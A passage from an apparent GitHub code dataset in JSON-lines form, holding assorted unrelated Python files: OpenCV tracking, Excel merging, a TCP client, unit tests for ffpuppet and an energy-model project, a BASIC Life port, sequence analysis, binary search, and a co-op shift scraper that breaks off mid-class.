+ 1\n text = ''\n for i, song in enumerate(songs):\n text += f'{first_num+i}. 
{song.title} [{song.duration}]\\n'\n footer = f'Page {self.page}/{page_len}'\n embed = discord.Embed(description=text, color=SILVER)\n embed.set_footer(text=footer)\n return embed\n","repo_name":"NotLafuan/sagiri-bot","sub_path":"utils/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":9013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38554479924","text":"import cv2\n\nTrList = [cv2.legacy.TrackerBoosting_create,\n cv2.TrackerMIL_create,\n cv2.TrackerKCF_create,\n cv2.legacy.TrackerTLD_create,\n cv2.legacy.TrackerMedianFlow_create,\n cv2.legacy.TrackerCSRT_create,\n cv2.legacy.TrackerMOSSE_create]\n\ntrackers = cv2.legacy.MultiTracker_create()\nvideo_src = \"./highway.mp4\"\nv = cv2.VideoCapture(video_src)\nret, frame = v.read()\nk = 2 # number of objects\nfor i in range(k):\n cv2.imshow('Frame',frame)\n bbox_i = cv2.selectROI('Frame',frame)\n tracker_i = TrList[5]()\n print(tracker_i)\n print(type(trackers))\n trackers.add(tracker_i,frame,bbox_i)\nwhile True:\n ret, frame = v.read()\n if not ret:\n break\n ok, boxes = trackers.update(frame)\n for box in boxes:\n (x,y,w,h) = [int(a) for a in box]\n cv2.rectangle(frame,(x,y),(x+w,y+h),(100,205,200),2)\n\n cv2.imshow('Frame',frame)\n key = cv2.waitKey(5)\n if key == ord('q'):\n break\nv.release()\ncv2.destroyWindow()\n","repo_name":"bob8dod/ML-studying","sub_path":"CV/ObjectTracking/MOT.py","file_name":"MOT.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41285063870","text":"import pandas as pd\nimport numpy as np\nimport os\n\n\ndef combine_table(table_1, table_2, table_3, out_path):\n df_1 = pd.read_excel(table_1, sheet_name='code')\n df_2 = pd.read_excel(table_2, sheet_name='code')\n df_3 = pd.read_excel(table_3, sheet_name='code')\n\n columns = ['glass_id', 'panel_id', 'category', 'score']\n out_df = pd.DataFrame(columns=columns)\n id = 0\n\n for row in df_1.itertuples():\n image_name = getattr(row, 'image_name')\n glass = image_name.split('.')[0]\n\n panel = getattr(row, 'panel_id')\n infer = getattr(row, 'category')\n score = getattr(row, 'score')\n\n id += 1\n out_df.loc[id] = [glass, panel, infer, score]\n\n for row in df_2.itertuples():\n image_name = getattr(row, 'image_name')\n glass = image_name.split('.')[0]\n\n panel = getattr(row, 'panel_id')\n infer = getattr(row, 'category')\n score = getattr(row, 'score')\n\n id += 1\n out_df.loc[id] = [glass, panel, infer, score]\n\n for row in df_3.itertuples():\n image_name = getattr(row, 'image_name')\n glass = image_name.split('_')[0]\n\n panel = getattr(row, 'panel_id')\n infer = getattr(row, 'category')\n score = getattr(row, 'score')\n\n id += 1\n out_df.loc[id] = [glass, panel, infer, score]\n\n out_df.to_excel(out_path, sheet_name='results')\n print('[FINISH] Table Combination.')\n\n\n\ndef merge_excel(category, root_path, out_path):\n \"\"\"\n :info: 默认是将‘0’类判断为预测正确\n :param category:\n :param root_path:\n :param out_path:\n :return:\n \"\"\"\n n = len(category)\n category = sorted(category)\n df = pd.DataFrame(np.zeros([n, n], dtype='uint'), index=category, columns=category)\n\n for table in os.listdir(root_path):\n table_path = os.path.join(root_path, table)\n df_tmp = pd.read_excel(table_path, index_col=0, sheet_name='图表')\n for col in df_tmp.columns:\n for row in df_tmp.columns:\n df[col][row] = int(df[col][row]) + int(df_tmp[col][row])\n\n predict_sum = []\n ori_sum = []\n precision_lst 
= []\n recall_lst = []\n for i in category:\n predict_cnt = sum(df[i])\n ori_cnt = sum(df.loc[i]) + df[i]['0']\n predict_sum.append(predict_cnt)\n ori_sum.append(ori_cnt)\n correct = df[i][i] + df[i]['0']\n precision = round(correct / predict_cnt, 3)\n recall = round(correct / ori_cnt, 3)\n precision_lst.append(precision)\n recall_lst.append(recall)\n\n df.loc['预测合计'] = predict_sum\n df.loc['准确率'] = precision_lst\n ori_sum = ori_sum + [None] * 2\n recall_lst = recall_lst + [None] * 2\n df['判图合计'] = ori_sum\n df['召回率'] = recall_lst\n\n df.to_excel(out_path, sheet_name='统计')\n print('[FINISH] Saving file to {}'.format(out_path))\n\n\nif __name__ == '__main__':\n table_1 = r\"E:\\Working\\Visionox\\V2_lighter\\file\\POC_report\\DemoReport\\test_1126\\2CEE01_results.xlsx\"\n table_2 = r\"E:\\Working\\Visionox\\V2_lighter\\file\\POC_report\\DemoReport\\test_1126\\2CIL01_results.xlsx\"\n table_3 = r\"E:\\Working\\Visionox\\V2_lighter\\file\\POC_report\\DemoReport\\test_1126\\Mapping_results.xlsx\"\n out_path = r\"E:\\Working\\Visionox\\V2_lighter\\file\\POC_report\\DemoReport\\test_1126\\results.xlsx\"\n combine_table(table_1, table_2, table_3, out_path)","repo_name":"OPzealot/Tools","sub_path":"merge_excel.py","file_name":"merge_excel.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37241625249","text":"import argparse, socket\n\ndef client(host, port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((host, port))\n print('Client has been assigned socket name', sock.getsockname())\n reply = sock.recv(1000)\n print(reply.decode())\n sock.close()\n\nif __name__ == '__main__':\n choices = {'client': client}\n parser = argparse.ArgumentParser(description='Send and receive over TCP')\n parser.add_argument('role', choices=choices, help='which role to play')\n parser.add_argument('host', help='interface the server listens at;'\n ' host the client sends to')\n parser.add_argument('-p', metavar='PORT', type=int, default=1060,\n help='TCP port (default 1060)')\n args = parser.parse_args()\n function = choices[args.role]\n function(args.host, args.p)\n","repo_name":"readera193/Python","sub_path":"網際網路協定/FINAL-Q1.py","file_name":"FINAL-Q1.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"37271715678","text":"import unittest\nimport pandas as pd\nimport numpy as np\nfrom os import listdir\nfrom os.path import isfile, join\nfrom Download_files import *\nfrom Pathfinder_processing_steps import remove_grid_from_results_multiply_with_lenght, pathfinder_main\nfrom Distribution import peakdemand_csv, transmission_matrix\nfrom post_elec_GIS_functions import network_length\n\nclass ImportTestCase(unittest.TestCase):\n def test_all_grid_is_removed(self):\n \"\"\"\n The test asserts that all cells that have a value below 0.5 is excluded from the total distribution lines for a 9 regions model\n :return:\n \"\"\"\n i = 1\n dict_pathfinder = {}\n dict_weight = {}\n while i <2:\n name = str(i)\n electrified = pd.read_csv(\"../test_data/temp/dijkstra/elec_path_%s.csv\" % (name), header=0 , index_col='Unnamed: 0')\n sum_one = electrified.sum()\n sum = sum_one.sum() #11638\n dict_pathfinder[name] = electrified\n weights = np.genfromtxt(\"../test_data/temp/dijkstra/%s_weight.csv\" %(name), delimiter=',')\n weights_trimmed = weights[1:-1, 1:-1]\n weight_pandas = 
pd.DataFrame(weights_trimmed)\n dict_weight[name] = weight_pandas\n sum_before =+ sum\n i += 1\n tofolder = '../test_data/'\n remove_grid_from_results_multiply_with_lenght(dict_pathfinder, dict_weight, tofolder) #74 target should be removed\n distribution = pd.read_csv(os.path.join(tofolder, 'distributionlines.csv'))\n sum_after = distribution.loc[0]['0']\n assert sum_before - sum_after==74\n\n #def test_whole_pathfinder_process(self):\n # path = '../test_data/Projected_files/'\n # proj_path = '../test_data/temp/temp'\n # elec_shp = '../test_data/Projected_files/elec.shp'\n # tofolder = '../test_data/'\n # pathfinder_main(path,proj_path, elec_shp, tofolder)\n # assert 1==1\n\n def test_peakdemand(self):\n HV = '../test_data/run/HV_cells.csv'\n distribution_length_cell_ref = '../test_data/run/ref/distribution.csv'\n distribution = '../test_data/run/ref/distributionlines.csv'\n demand = '../test_data/run/ref/ref_demand.csv'\n specifieddemand = '../test_data/run/ref/demandprofile_rural.csv'\n capacitytoactivity = 31.536\n yearsplit = '../test_data/run/Demand/yearsplit.csv'\n reffolder = '../test_data/run/ref'\n distr_losses = 0.83\n\n peakdemand_csv(demand, specifieddemand, capacitytoactivity, yearsplit, distr_losses, HV, distribution,\n distribution_length_cell_ref, reffolder)\n\n # error message in case if test case got failed\n results = pd.read_csv(os.path.join(reffolder,'peakdemand.csv'),index_col='Fuel')\n first = results.loc['TRLV_1_0', '2040']\n second = 0.54\n decimalPlace = 2\n self.assertAlmostEqual( first, second, decimalPlace)\n\n def test_transmissionlines_connection(self):\n topath = '../test_data/run/Demand'\n noHV = '../test_data/run/noHV_cells.csv'\n HV = '../test_data/run/HV_cells.csv'\n minigrid = '../test_data/run/elec_noHV_cells.csv'\n neartable = '../test_data/run/Demand/Near_table.csv'\n adjacencym = transmission_matrix(neartable, noHV, HV, minigrid, topath)\n self.assertTrue(len(adjacencym) == 656)\n\n def test_networklength_calculation(self):\n tofolder = '../test_data/run/ref'\n demandcells = '../test_data/run/Demand/demand_cells.csv'\n input = '../test_data/input/input_data.csv'\n demand = network_length(demandcells, input, tofolder)\n first = demand.loc['11', 'LV_km']\n second =2.66\n decimalPlace = 2\n self.assertAlmostEqual(first,second,decimalPlace)\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"KTH-dESA/GEOSeMOSYS_Kenya","sub_path":"src/test_GEOSeMOSYS_Kenya.py","file_name":"test_GEOSeMOSYS_Kenya.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19361025866","text":"# type: ignore\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\"\"\"ffpuppet bootstrapper tests\"\"\"\n# pylint: disable=protected-access\n\nfrom itertools import repeat\nfrom socket import socket, timeout\nfrom threading import Thread\n\nfrom pytest import mark, raises\n\nfrom .bootstrapper import Bootstrapper\nfrom .exceptions import BrowserTerminatedError, BrowserTimeoutError, LaunchError\n\n\ndef test_bootstrapper_01():\n \"\"\"test simple Bootstrapper()\"\"\"\n with Bootstrapper() as bts:\n assert bts._socket is not None\n assert bts.location.startswith(\"http://127.0.0.1:\")\n assert int(bts.location.split(\":\")[-1]) > 1024\n assert bts.port > 1024\n assert bts.port not in Bootstrapper.BLOCKED_PORTS\n bts.close()\n assert bts._socket is None\n\n\ndef test_bootstrapper_02(mocker):\n \"\"\"test Bootstrapper.wait() failure waiting for initial connection\"\"\"\n fake_sock = mocker.MagicMock(spec_set=socket)\n fake_sock.accept.side_effect = timeout\n mocker.patch(\"ffpuppet.bootstrapper.socket.socket\", return_value=fake_sock)\n with Bootstrapper() as bts:\n # test failure\n with raises(\n BrowserTerminatedError, match=\"Failure waiting for browser connection\"\n ):\n bts.wait(lambda: False)\n assert fake_sock.accept.call_count == 1\n fake_sock.reset_mock()\n # test timeout\n mocker.patch(\"ffpuppet.bootstrapper.time\", side_effect=(1, 1, 1, 2))\n with raises(\n BrowserTimeoutError, match=\"Timeout waiting for browser connection\"\n ):\n bts.wait(lambda: True, timeout=0.1)\n # should call accept() at least 2x for positive and negative timeout check\n assert fake_sock.accept.call_count > 1\n\n\ndef test_bootstrapper_03(mocker):\n \"\"\"test Bootstrapper.wait() failure waiting for request\"\"\"\n fake_sock = mocker.MagicMock(spec_set=socket)\n fake_conn = mocker.Mock(spec_set=socket)\n fake_conn.recv.side_effect = timeout\n fake_sock.accept.return_value = (fake_conn, None)\n mocker.patch(\"ffpuppet.bootstrapper.socket.socket\", return_value=fake_sock)\n with Bootstrapper() as bts:\n # test failure\n with raises(BrowserTerminatedError, match=\"Failure waiting for request\"):\n bts.wait(lambda: False)\n assert fake_conn.recv.call_count == 1\n assert fake_conn.close.call_count == 1\n fake_conn.reset_mock()\n # test timeout\n mocker.patch(\"ffpuppet.bootstrapper.time\", side_effect=(1, 1, 1, 1, 2))\n with raises(BrowserTimeoutError, match=\"Timeout waiting for request\"):\n bts.wait(lambda: True, timeout=0.1)\n # should call recv() at least 2x for positive and negative timeout check\n assert fake_conn.recv.call_count > 1\n assert fake_conn.close.call_count == 1\n\n\ndef test_bootstrapper_04(mocker):\n \"\"\"test Bootstrapper.wait() failure sending response\"\"\"\n fake_sock = mocker.MagicMock(spec_set=socket)\n fake_conn = mocker.Mock(spec_set=socket)\n fake_conn.recv.return_value = \"A\"\n fake_conn.sendall.side_effect = timeout\n fake_sock.accept.return_value = (fake_conn, None)\n mocker.patch(\"ffpuppet.bootstrapper.socket.socket\", return_value=fake_sock)\n with Bootstrapper() as bts:\n # test timeout\n with raises(BrowserTimeoutError, match=\"Timeout sending response\"):\n bts.wait(lambda: True)\n assert fake_conn.recv.call_count == 1\n assert fake_conn.sendall.call_count == 1\n assert fake_conn.close.call_count == 1\n fake_conn.reset_mock()\n # test failure\n with raises(BrowserTerminatedError, match=\"Failure during browser startup\"):\n bts.wait(lambda: False)\n assert fake_conn.recv.call_count == 1\n assert fake_conn.sendall.call_count 
== 1\n assert fake_conn.close.call_count == 1\n\n\ndef test_bootstrapper_05(mocker):\n \"\"\"test Bootstrapper.wait() target crashed\"\"\"\n fake_sock = mocker.MagicMock(spec_set=socket)\n fake_conn = mocker.Mock(spec_set=socket)\n fake_conn.recv.return_value = \"foo\"\n fake_sock.accept.return_value = (fake_conn, None)\n mocker.patch(\"ffpuppet.bootstrapper.socket.socket\", return_value=fake_sock)\n with Bootstrapper() as bts:\n with raises(BrowserTerminatedError, match=\"Failure during browser startup\"):\n bts.wait(lambda: False)\n assert fake_conn.close.call_count == 1\n\n\n@mark.parametrize(\n \"redirect, recv, closed\",\n [\n # normal startup\n (None, (\"foo\",), 1),\n # with a redirect url\n (\"http://127.0.0.1:9999/test.html\", (\"foo\",), 1),\n # request size matches buffer size\n (None, (\"A\" * Bootstrapper.BUF_SIZE, timeout), 1),\n # large request\n (None, (\"A\" * Bootstrapper.BUF_SIZE, \"foo\"), 1),\n # slow startup\n (None, (timeout, timeout, \"foo\"), 1),\n # slow failed startup with retry\n (None, (timeout, \"\", \"foo\"), 2),\n ],\n)\ndef test_bootstrapper_06(mocker, redirect, recv, closed):\n \"\"\"test Bootstrapper.wait()\"\"\"\n fake_sock = mocker.MagicMock(spec_set=socket)\n fake_conn = mocker.Mock(spec_set=socket)\n fake_conn.recv.side_effect = recv\n fake_sock.accept.return_value = (fake_conn, None)\n mocker.patch(\"ffpuppet.bootstrapper.socket.socket\", return_value=fake_sock)\n with Bootstrapper() as bts:\n bts.wait(lambda: True, url=redirect)\n assert fake_conn.close.call_count == closed\n assert fake_conn.recv.call_count == len(recv)\n assert fake_conn.sendall.call_count == 1\n\n\ndef test_bootstrapper_07():\n \"\"\"test Bootstrapper.wait() with a fake browser\"\"\"\n\n def _fake_browser(port, payload_size=5120):\n conn = socket()\n # 50 x 0.1 = 5 seconds\n conn.settimeout(0.1)\n # open connection\n for attempt in reversed(range(50)):\n try:\n conn.connect((\"127.0.0.1\", port))\n break\n except timeout:\n if not attempt:\n raise\n # send request and receive response\n try:\n conn.settimeout(10)\n conn.sendall(b\"A\" * payload_size)\n conn.send(b\"\")\n conn.recv(8192)\n finally:\n conn.close()\n\n with Bootstrapper() as bts:\n browser_thread = Thread(target=_fake_browser, args=(bts.port,))\n try:\n browser_thread.start()\n bts.wait(lambda: True, timeout=10)\n finally:\n browser_thread.join()\n\n\n@mark.parametrize(\n \"bind, attempts, raised\",\n [\n # failed to bind (OSError)\n ((OSError(0, \"foo1\"),), 1, LaunchError),\n # failed to bind (PermissionError) - multiple attempts\n (repeat(PermissionError(10013, \"foo2\"), 4), 4, LaunchError),\n ],\n)\ndef test_bootstrapper_08(mocker, bind, attempts, raised):\n \"\"\"test Bootstrapper() - failures\"\"\"\n mocker.patch(\"ffpuppet.bootstrapper.sleep\", autospec=True)\n fake_sock = mocker.MagicMock(spec_set=socket)\n fake_sock.bind.side_effect = bind\n mocker.patch(\"ffpuppet.bootstrapper.socket.socket\", return_value=fake_sock)\n with raises(raised):\n with Bootstrapper(attempts=attempts):\n pass\n assert fake_sock.bind.call_count == attempts\n assert fake_sock.close.call_count == attempts\n\n\ndef test_bootstrapper_09(mocker):\n \"\"\"test Bootstrapper() - blocked ports\"\"\"\n fake_sock = mocker.MagicMock(spec_set=socket)\n fake_sock.getsockname.side_effect = (\n (None, Bootstrapper.BLOCKED_PORTS[0]),\n (None, 12345),\n )\n mocker.patch(\"ffpuppet.bootstrapper.socket.socket\", return_value=fake_sock)\n with Bootstrapper(attempts=2):\n pass\n assert fake_sock.close.call_count == 
2\n","repo_name":"MozillaSecurity/ffpuppet","sub_path":"src/ffpuppet/test_bootstrapper.py","file_name":"test_bootstrapper.py","file_ext":"py","file_size_in_byte":7826,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"44"} +{"seq_id":"20290603785","text":"\"\"\"\nLIFE\n\nAn implementation of John Conway's popular cellular automaton\n\nPorted by Dave LeCompte\n\"\"\"\n\nfrom typing import Dict\n\nPAGE_WIDTH = 64\n\nMAX_WIDTH = 70\nMAX_HEIGHT = 24\n\n\ndef print_centered(msg) -> None:\n spaces = \" \" * ((PAGE_WIDTH - len(msg)) // 2)\n print(spaces + msg)\n\n\ndef print_header(title) -> None:\n print_centered(title)\n print_centered(\"CREATIVE COMPUTING MORRISTOWN, NEW JERSEY\")\n print()\n print()\n print()\n\n\ndef get_pattern() -> Dict[int, str]:\n print(\"ENTER YOUR PATTERN:\")\n c = 0\n\n pattern: Dict[int, str] = {}\n while True:\n line = input()\n if line == \"DONE\":\n return pattern\n\n # BASIC input would strip of leading whitespace.\n # Python input does not. The following allows you to start a\n # line with a dot to disable the whitespace stripping. This is\n # unnecessary for Python, but for historical accuracy, it's\n # staying in.\n\n if line[0] == \".\":\n line = \" \" + line[1:]\n pattern[c] = line\n c += 1\n\n\ndef main() -> None:\n print_header(\"LIFE\")\n\n pattern = get_pattern()\n\n pattern_height = len(pattern)\n pattern_width = 0\n for _line_num, line in pattern.items():\n pattern_width = max(pattern_width, len(line))\n\n min_x = 11 - pattern_height // 2\n min_y = 33 - pattern_width // 2\n max_x = MAX_HEIGHT - 1\n max_y = MAX_WIDTH - 1\n\n a = [[0 for y in range(MAX_WIDTH)] for x in range(MAX_HEIGHT)]\n p = 0\n g = 0\n invalid = False\n\n # line 140\n # transcribe the input pattern into the active array\n for x in range(0, pattern_height):\n for y in range(0, len(pattern[x])):\n if pattern[x][y] != \" \":\n a[min_x + x][min_y + y] = 1\n p += 1\n\n print()\n print()\n print()\n while True:\n if invalid:\n inv_str = \"INVALID!\"\n else:\n inv_str = \"\"\n\n print(f\"GENERATION: {g}\\tPOPULATION: {p} {inv_str}\")\n\n next_min_x = MAX_HEIGHT - 1\n next_min_y = MAX_WIDTH - 1\n next_max_x = 0\n next_max_y = 0\n\n p = 0\n g += 1\n for _ in range(min_x):\n print()\n\n for x in range(min_x, max_x + 1):\n print()\n line_list = [\" \"] * MAX_WIDTH\n for y in range(min_y, max_y + 1):\n if a[x][y] == 2:\n a[x][y] = 0\n continue\n elif a[x][y] == 3:\n a[x][y] = 1\n elif a[x][y] != 1:\n continue\n\n line_list[y] = \"*\"\n\n next_min_x = min(x, next_min_x)\n next_max_x = max(x, next_max_x)\n next_min_y = min(y, next_min_y)\n next_max_y = max(y, next_max_y)\n\n print(\"\".join(line_list))\n\n # line 295\n for _ in range(max_x + 1, MAX_HEIGHT):\n print()\n\n print()\n\n min_x = next_min_x\n max_x = next_max_x\n min_y = next_min_y\n max_y = next_max_y\n\n if min_x < 3:\n min_x = 3\n invalid = True\n if max_x > 22:\n max_x = 22\n invalid = True\n if min_y < 3:\n min_y = 3\n invalid = True\n if max_y > 68:\n max_y = 68\n invalid = True\n\n # line 309\n p = 0\n\n for x in range(min_x - 1, max_x + 2):\n for y in range(min_y - 1, max_y + 2):\n count = 0\n for i in range(x - 1, x + 2):\n for j in range(y - 1, y + 2):\n if a[i][j] == 1 or a[i][j] == 2:\n count += 1\n if a[x][y] == 0:\n if count == 3:\n a[x][y] = 3\n p += 1\n elif (count < 3) or (count > 4):\n a[x][y] = 2\n else:\n p += 1\n\n # line 635\n min_x = min_x - 1\n min_y = min_y - 1\n max_x = max_x + 1\n max_y = max_y + 1\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"coding-horror/basic-computer-games","sub_path":"55_Life/python/life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","stars":10601,"dataset":"github-code","pt":"44"} +{"seq_id":"12298320490","text":"from util import iterate_csv\nimport sys\n\ndef main():\n report = sys.argv[1]\n output_csv = sys.argv[2]\n\n output_lines = ['paper,assignment,email']\n for r in iterate_csv(report):\n valid, paper, email, reasons = r\n\n if valid=='x':\n output_lines.append(\"%s,conflict,%s\" %(paper, email))\n\n with open(output_csv,'w') as f:\n f.write('\\n'.join(output_lines))\n f.write('\\n')\n\nif __name__ == '__main__':\n main()\n","repo_name":"mdrumond/pc-chair-kit","sub_path":"report_to_csv.py","file_name":"report_to_csv.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"70340496774","text":"import pandas as pd\nimport glob\nimport sys\nimport re\nfrom pandas import DataFrame\n\n\n\nif sys.version_info[0] > 2:\n FG_id = input(\"Given the interesting taxon IDs you want to compare, should be separated by space >\")\n BG_id = input(\"Given the background taxon IDs or ignore it by press enter to use all rests as background >\")\n ext = input(\"Given the input file extension >\")\nelse:\n FG_id = raw_input(\"Given the interesting taxon IDs you want to compare, should be separated by space >\")\n BG_id = raw_input(\"Given the background taxon IDs or ignore it by press enter to use all rests as background >\")\n ext = raw_input(\"Given the input file extension >\")\n\nFG_list = FG_id.split()\nBG_list_user = BG_id.split()\n\"\"\"\nFG_id = 'ctx0001 ctx0002 ctx0009'\nFG_list = ['ctx0001', 'ctx0002', 'ctx0009']\next = 'fasta'\n\"\"\"\nignore_character = ['-','x','X','U','u','O','o','B','b','Z','z','J','j']\nAA_list = ['A','R','N','D','C','E','Q','G','H','I','L','K','M','F','P','S','T','W','Y','V','a','r','n','d','c','e','q','g','h','i','l','k','m','f','p','s','t','w','y','v']\nidentity_list = []\nfor file in glob.glob('./*'+ext):\n stander_ID = re.match(r'\\S*(ENS\\w{12})\\S*', file)\n if stander_ID is not None:\n geneid = stander_ID.group(1)\n else:\n geneid = file\n with open(file) as f:\n records = f.read()\n seq1 = records.split('>')[1:]\n seq2 = [seq.partition('\\n') for seq in seq1]\n seq3 = {seq[0].strip():seq[2].strip() for seq in seq2}\n all_taxon_list = list(seq3.keys())\n if len(BG_list_user) != 0:\n BG_list = BG_list_user\n else:\n BG_list = list(set(all_taxon_list).difference(set(FG_list)))\n seq_length = len(list(seq3.values())[0])\n# identity_sites = []\n for i in range(0,seq_length):\n FG_sites = []\n BG_sites = []\n for spf in FG_list:\n# if seq3[spf][i] != '-':\n FG_sites.append(seq3[spf][i])\n for spb in BG_list:\n# if seq3[spb][i] != '-':\n BG_sites.append(seq3[spb][i])\n if set(FG_sites).issubset(AA_list) and set(BG_sites) < set(AA_list) and len(set(FG_sites)) == 1 and len(set(FG_sites) & set(BG_sites)) == 0:\n identity_dict = {}\n identity_dict['Gene_ID'] = geneid\n identity_dict['FG_Taxons'] = FG_list\n identity_dict['BG_Taxons'] = BG_list\n identity_dict['FG_AA'] = FG_sites\n identity_dict['Position'] = i+1\n identity_dict['BG_AA'] = BG_sites\n if len(identity_dict) != 0:\n identity_list.append(identity_dict)\n\nif len(identity_list) != 0:\n identity_df = DataFrame(identity_list)\n# if not identity_df.empty:\n 
identity_df.set_index('Gene_ID').sort_index().to_csv('_'.join(FG_list)+\"identifity_info.csv\",header=True,index=True)\nelse:\n print(\"No identify sites were found at interesting taxons, you may want to try other taxons\")\n\n\nprint(identity_df)\n\n\n\n\n\n\"\"\"\nhttps://stackoverflow.com/questions/3844801/check-if-all-elements-in-a-list-are-identical\ndef checkEqual1(iterator):\n iterator = iter(iterator)\n try:\n first = next(iterator)\n except StopIteration:\n return True\n return all(first == rest for rest in iterator)\nOne-liner:\n\ndef checkEqual2(iterator):\n return len(set(iterator)) <= 1\nAlso one-liner:\n\ndef checkEqual3(lst):\n return lst[1:] == lst[:-1]\n\n# http://stackoverflow.com/q/3844948/\ndef checkEqualIvo(lst):\n return not lst or lst.count(lst[0]) == len(lst)\n\n# http://stackoverflow.com/q/3844931/\ndef checkEqual6502(lst):\n return not lst or [lst[0]]*len(lst) == lst\n\"\"\"\n\n\n\n\n\n\n\n","repo_name":"binlu1981/GenomicPips","sub_path":"find_identical_AA_position .py","file_name":"find_identical_AA_position .py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"2446192806","text":"#!/bin/python\nimport numpy\nimport os\nimport os.path\nimport pickle\nfrom sklearn.cluster.k_means_ import KMeans\nfrom sklearn.mixture import GaussianMixture\nimport sklearn.mixture._gaussian_mixture\nimport sklearn.mixture\nimport sys\nimport scipy\n# Generate gmm features for videos; each video is represented by a single vector\n\nif __name__ == '__main__':\n if len(sys.argv) != 4:\n print (\"Usage: {0} gmm_model, cluster_num, file_list\".format(sys.argv[0]))\n print (\"gmm_model -- path to the gmm model\")\n print (\"cluster_num -- number of cluster\")\n print (\"file_list -- the list of videos\")\n exit(1)\n\n gmm_model = sys.argv[1]; file_list = sys.argv[3]\n cluster_num = int(sys.argv[2])\n\n # load the gmm model\n gmmx = pickle.load(open(gmm_model, 'rb'))\n \n \n files = open(file_list, \"r\")\n \n \n out_file = '/home/ubuntu/multimedia/11775-hws-master/hw1_code/soundnet16_gmm/50_features_soundnet16.gmm.npy'\n all_gmm = []\n \n for file in files:\n \tfile_name = '/home/ubuntu/multimedia/11775-hws-master/hw1_code/sound_net_16/'+file.strip()+ \"_16.npy\"\n \tprint(file_name)\n \tif os.path.isfile(file_name):\n \t x1 = numpy.load(file_name) \t\n\t\t\n \t gmmo = gmmx.predict(x1)\n \t\n \t hist, _ = numpy.histogram(gmmo, 50, density=False)\n \t\n \t hist = hist/numpy.sum(hist)\n \t\t \t\t\n \telse:\n \t hist = numpy.zeros((50,))\n \t\n \tall_gmm.append(hist)\n \t\n numpy.save(out_file, all_gmm)\n files.close()\n print (\"gmm features generated successfully!\")\n","repo_name":"ChetanMJ/Multi-Media-Event-Detection","sub_path":"MED_with_Audio_ASR/scripts/create_soundnet_gmm.py","file_name":"create_soundnet_gmm.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"2769030461","text":"from controlecartao import db\n\n\nclass Cartao(db.Model):\n def __init__(self, id=int, data=str, doc=int, tipo=str, valor=float):\n self.id = id\n self.data = data\n self.doc = doc\n self.tipo = tipo\n self.valor = valor\n\n def __repr__(self):\n return '' % self.name\n","repo_name":"RenanAmaro/controlecartao","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} 
+{"seq_id":"35390458797","text":"# Question: Given a SORTED 2D matrix and a search key, \n# find out if it exists in the matrix\n\n## Obviously we can do this trivially in O(M * N) time and O(1) space\n## Can we do better? Yeah! With binary_search\n\nclass Solution:\n def bin_search(self, lst, val, l, r):\n if r < l:\n return False \n mid = l + (r - l) // 2\n \n if lst[mid] == val:\n return True\n elif lst[mid] <= val:\n return self.bin_search(lst, val, mid+1, r)\n else:\n return self.bin_search(lst, val, l, mid -1)\n \n \n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n for lst in matrix:\n if self.bin_search(lst, target, 0, len(lst) - 1):\n return True\n return False\n\n### Getting index of the key should be \n# trivial from the above the solution above. We can just iterate\n# using row number and find the col number in binary_search.\n\n## Dead giveaway of bin_search -> sorted array\n\n## But since the whole thing is sorted, we can reduce the row \n# iteration to log M time. Skipping bin_search code here.\n\ndef searchMatrixBinary(matrix, target):\n for arr in matrix:\n if not len(arr):\n continue\n if arr[-1] > target:\n continue\n elif arr[0] > target:\n return False\n elif arr[0] <= target and arr[-1] >= target:\n return binary_search(arr, 0, len(arr) - 1)","repo_name":"raopg/algorithm-solutions","sub_path":"Python/2d_matrix_search.py","file_name":"2d_matrix_search.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"70950455493","text":"import requests\nimport shelve\nimport logging\nimport datetime\n\nfrom bs4 import BeautifulSoup\nfrom typing import List, Optional, Type\nfrom types import TracebackType\n\nfrom url_constants import BASE_URL, LOGIN_URL, CSRF_KEY, SHIFTS_URL, EXTRA_DATA_URL\n\n\nlogger: logging.Logger = logging.getLogger(__name__)\n\n\nclass CoopSession:\n SESSION_KEY: str = \"shifter_session\"\n DB_PATH: str = \"/tmp/shifter_session_db\"\n TEXT_EVERY_SECS: int = 60 * 60 # 1 hour\n\n def __init__(self, keep_session_alive: bool, username: str, password: str) -> None:\n self.keep_session_alive: bool = keep_session_alive\n self.text_sent_timestamp: int = 0\n self.username: str = username\n self.password: str = password\n\n def __enter__(self) -> None:\n with shelve.open(self.DB_PATH) as db:\n if self.SESSION_KEY not in db:\n logger.info(\"Creating new session\")\n self.session = requests.Session()\n self._login()\n else:\n session = db[self.SESSION_KEY]\n logger.info(\"Grabbed session from local DB\")\n if not self._does_session_still_work(session):\n logger.info(\"Session from DB does not work. 
